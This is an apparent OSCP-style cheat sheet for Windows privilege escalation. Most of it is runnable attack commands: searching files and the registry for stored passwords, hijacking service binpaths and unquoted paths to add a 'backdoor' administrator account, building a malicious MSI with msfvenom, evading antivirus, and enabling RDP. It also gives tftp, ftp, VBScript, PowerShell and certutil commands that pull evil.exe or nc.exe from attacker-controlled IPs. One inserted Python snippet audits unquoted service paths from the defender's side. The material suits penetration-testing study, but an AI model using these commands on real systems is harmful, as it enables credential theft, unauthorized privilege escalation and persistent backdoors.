
OSCP - Windows Privilege Escalation

Information Gathering

+ What system are we connected to?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
+ Get the hostname and username (if available)
hostname
echo %username%
+ Learn about your environment
SET
echo %PATH%
+ List other users on the box
net users
net user <username>
+ Networking/Routing Info
ipconfig /all
route print
arp -A
+ Active Network Connections
netstat -ano
+ Firewall Status (only on Win XP SP2 and above)
netsh firewall show state
netsh firewall show config
netsh advfirewall firewall show rule name=all
+ Scheduled tasks
schtasks /query /fo LIST /v
+ Check how Running processes link to started services
tasklist /SVC       
+ Windows services that are started:
net start
+ Driver madness (3rd party drivers may have holes)
DRIVERQUERY
+ Check systeminfo output against exploit-suggester
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
+ Run windows-privesc script
https://github.com/pentestmonkey/windows-privesc-check

WMIC

Windows Management Instrumentation Command Line
Windows XP requires admin
+ Use wmic_info.bat script for automation
http://www.fuzzysecurity.com/tutorials/files/wmic_info.rar     
+ System Info
wmic COMPUTERSYSTEM get TotalPhysicalMemory,caption
wmic CPU Get /Format:List
+ Check patch level
wmic qfe get Caption,Description,HotFixID,InstalledOn
  1. Look for privilege escalation exploits and look up their respective KB patch numbers. Such exploits include, but are not limited to, KiTrap0D (KB979682), MS11-011 (KB2393802), MS10-059 (KB982799), MS10-021 (KB979683), MS11-080 (KB2592799)
  2. After enumerating the OS version and Service Pack you should find out which privilege escalation vulnerabilities could be present. Using the KB patch numbers you can grep the installed patches to see if any are missing
  3. Search patches for given patch
    wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."
    Examples:
    Windows 2K SP4 - Windows 7 (x86): KiTrap0D (KB979682)
    wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"
    Windows Vista/2008 6.1.6000 x32, Windows Vista/2008 6.1.6001 x32, Windows 7 6.2.7600 x32, Windows 7/2008 R2 6.2.7600 x64. (no good exploit - unlikely Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))
    wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"

Stored Credentials

  1. Directories that contain the configuration files (however, better check the entire filesystem). These files contain passwords either in clear text or in a Base64 encoded format.
    C:\sysprep.inf
    C:\sysprep\sysprep.xml
    %WINDIR%\Panther\Unattend\Unattended.xml
    %WINDIR%\Panther\Unattended.xml
  2. When the box is connected to a Domain:
    1. Look for Groups.xml in SYSVOL
      GPO preferences can be used to create local users on the domain, so passwords might be stored there. Any authenticated user will have read access to this file. The password is encrypted with AES, but the static key is published on the MSDN website, so it can be decrypted.
    2. Search for other policy preference files that can have the optional “cPassword” attribute set:
      Services\Services.xml: Element-Specific Attributes
      ScheduledTasks\ScheduledTasks.xml: Task Inner Element, TaskV2 Inner Element, ImmediateTaskV2 Inner Element
      Printers\Printers.xml: SharedPrinter Element
      Drives\Drives.xml: Element-Specific Attributes
      DataSources\DataSources.xml: Element-Specific Attributes
  3. Automated Tools
    1. Metasploit Module
      post/windows/gather/credentials/gpp
      post/windows/gather/enum_unattend
    2. Powersploit
      https://github.com/PowerShellMafia/PowerSploit
      Get-GPPPassword
      Get-UnattendedInstallFile
      Get-Webconfig
      Get-ApplicationHost
      Get-SiteListPassword
      Get-CachedGPPPassword
      Get-RegistryAutoLogon
  4. Search filesystem:
    1. Search for specific keywords:
      dir /s *pass* == *cred* == *vnc* == *.config*
    2. Search certain file types for a keyword
      findstr /si password *.xml *.ini *.txt
    3. Search for certain files
      dir /b /s unattend.xml
      dir /b /s web.config
      dir /b /s sysprep.inf
      dir /b /s sysprep.xml
      dir /b /s *pass*
      dir /b /s vnc.ini
    4. Grep the registry for keywords (e.g. “passwords”)
      reg query HKLM /f password /t REG_SZ /s
      reg query HKCU /f password /t REG_SZ /s
      reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
      reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP"
      reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
      reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password
    5. Find writeable files
      dir /a-r-d /s /b
      1. /a is to search for attributes. In this case r is read-only and d is directory. The minus signs negate those attributes, so we're looking for writable files only.
      2. /s means recurse subdirectories
      3. /b means bare format. Path and filename only.

Trusted Service Paths

  1. List all unquoted service paths (minus built-in Windows services) on our compromised machine:
    wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
    Suppose we found:
    C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
    If you look at the registry entry for this service with Regedit you can see the ImagePath value is:
    C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
    To be secure it should be like this:
    "C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"
    When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it finds:
    C:\Program.exe
    C:\Program Files.exe
    C:\Program Files (x86)\Program Folder\A.exe
    ...
  2. Check permissions of folder path
    icacls "C:\Program Files (x86)\Program Folder"
  3. If we can write in the path, we plant a backdoor with the same name as the service and restart the service.
Metasploit module:
exploit/windows/local/trusted_service_path
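
The same check from the defender's side, as an added example that is not part of the original page: it flags unquoted ImagePath values that contain spaces, lists every path Windows would try before the intended binary (the locations whose ACLs need reviewing with icacls), and builds the quoted value to set instead. The service names and sample paths are constructed, and `exe_part`, `candidates`, `quoted_fix` and `audit` are names chosen for this example.

```python
import re

# Constructed sample: (service name, ImagePath) pairs, as exported from the registry or wmic.
SAMPLE = [
    ("ExampleSvc", r"C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe"),
    ("QuotedSvc", r'"C:\Program Files\Vendor\agent.exe" --run'),
    ("NoSpaceSvc", r"C:\Tools\svc.exe -k"),
    ("BuiltIn", r"C:\Windows\system32\svchost.exe -k netsvcs"),
]

def exe_part(image_path):
    """Executable portion of an unquoted ImagePath: everything up to the first '.exe'."""
    p = image_path.strip()
    m = re.match(r"(.+?\.exe)(?=\s|$)", p, re.IGNORECASE)
    return m.group(1) if m else p

def candidates(image_path):
    """Paths Windows tries, in order, before the intended binary (one per space in the path)."""
    parts = exe_part(image_path).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def quoted_fix(image_path):
    """The ImagePath value with the executable quoted and any arguments kept."""
    p = image_path.strip()
    exe = exe_part(p)
    return f'"{exe}"{p[len(exe):]}'

def audit(services):
    """Map each service with an unquoted, space-containing path to its candidate list."""
    findings = {}
    for name, image_path in services:
        if image_path.strip().startswith('"'):
            continue  # already quoted: no ambiguity
        found = candidates(image_path)
        if found:
            findings[name] = found
    return findings

if __name__ == "__main__":
    for name, found in audit(SAMPLE).items():
        print(f"[!] {name}: unquoted path, review write access on:")
        for c in found:
            print(f"      {c}")
        print(f"    fix: {quoted_fix(dict(SAMPLE)[name])}")
```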

Vulnerable Services

Search for services that have a binary path (binpath) property which can be modified by non-Admin users - in that case change the binpath to execute a command of your own.
Note: Windows XP shipped with several vulnerable built-in services.
Use accesschk from SysInternals to search for these vulnerable services.
https://technet.microsoft.com/en-us/sysinternals/bb842062.aspx
For Windows XP, version 5.2 of accesschk is needed:
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -qdws "Authenticated Users" C:\Windows\ /accepteula
accesschk.exe -qdws Users C:\Windows\
Then query the service using Windows sc:
sc qc <vulnerable service name>
Then change the binpath to execute your own commands (restart of the service will most likely be needed):
sc config <vuln-service> binpath= "net user backdoor backdoor123 /add"
sc stop <vuln-service>
sc start <vuln-service>
sc config <vuln-service> binpath= "net localgroup Administrators backdoor /add"
sc stop <vuln-service>
sc start <vuln-service>
Note - Might need to use the depend attribute explicitly:
sc stop <vuln-service>
sc config <vuln-service> binPath= "c:\inetpub\wwwroot\runmsf.exe" depend= "" start= demand obj= ".\LocalSystem" password= ""
sc start <vuln-service>
Metasploit module:
exploit/windows/local/service_permissions

AlwaysInstallElevated

AlwaysInstallElevated is a setting that allows non-privileged users the ability to run Microsoft Windows Installer Package Files (MSI) with elevated (SYSTEM) permissions.
Check if these 2 registry values are set to “1”:
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
If they are, create your own malicious msi:
msfvenom -p windows/adduser USER=backdoor PASS=backdoor123 -f msi -o evil.msi
Then use msiexec on victim to execute your msi:
msiexec /quiet /qn /i C:\evil.msi
Metasploit module:
exploit/windows/local/always_install_elevated

Bypassing AV

  • Use Veil-Evasion
  • Create your own executable by “compiling” PowerShell scripts
  • Use Metasploit to substitute custom EXE and MSI binaries. You can set EXE::Custom or MSI::Custom to point to your binary prior to executing the module.

Getting GUI

+ Using meterpreter, inject vnc session:
run post/windows/manage/payload_inject payload=windows/vncinject/reverse_tcp lhost=<yourip> options=viewonly=false
+ Enable RDP:
netsh firewall set service RemoteDesktop enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
sc config TermService start= auto
net start Termservice
netsh.exe firewall add portopening TCP 3389 "Remote Desktop"
OR:
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=tcp
netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes profile=private,domain localport=3389 protocol=udp
OR (meterpreter)
run post/windows/manage/enable_rdp
https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/

Python exploits

Compiling Python Exploits for Windows on Linux
  1. Install pyinstaller for Windows with wine on Kali and then
    wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile 18176.py
  2. Run `pyinstaller` located under the same directory as Python scripts
    wine ~/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile HelloWorld.py
  3. Execute with wine
    wine ~/.wine/drive_c/dist/HelloWorld.exe

File Transfers

Limit commands on the shell to be non-interactive
https://blog.netspi.com/15-ways-to-download-a-file/

TFTP

Windows XP and Win 2003 contain a tftp client. Windows 7 does not by default
tftp clients are usually non-interactive, so they could work through an obtained shell
atftpd --daemon --port 69 /tftp
Windows> tftp -i 192.168.30.45 GET nc.exe

FTP

Windows contains an FTP client, but FTP clients are usually interactive
Solution: scripted parameters in ftp client: ftp -s
ftp-commands
echo open 192.168.30.5 21> ftp.txt
echo USER username password >> ftp.txt
echo bin >> ftp.txt
echo GET evil.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt

VBScript

wget-vbs script: echo trick again, copy and paste the commands in the shell
echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http,varByteArray,strData,strBuffer,lngCounter,fs,ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET",strURL,False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile,True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1,1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs
cscript wget.vbs http://10.11.0.102/evil.exe test.txt

Powershell

echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.11.0.102/powerup.ps1" >>wget.ps1
echo $file = "powerup.ps1" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Webdav

On Kali Linux install wsgidav and cheroot
pip install wsgidav cheroot
Start the wsgidav on a restricted folder:
mkdir /tmp/webdav_folder
wsgidav --host=0.0.0.0 --port=80 --root=/tmp/webdav_folder
On Windows mount this folder using net use:
net use * http://YOUR_IP_ADDRESS/
Reference: https://github.com/mar10/wsgidav

BitsAdmin

bitsadmin /transfer n http://domain/file c:%homepath%file

debug.exe

First use upx or similar to compress the executable:
upx -9 nc.exe
Then use exe2bat to convert the executable into a series of echo commands that are meant to be copied and pasted in the remote system:
wine exe2bat.exe nc.exe nc.txt
Then copy and paste each command from nc.txt in the remote system. The commands will gradually rebuild the executable in the target machine.

certutil

certutil.exe -URL will fetch ANY file and download it here:
C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
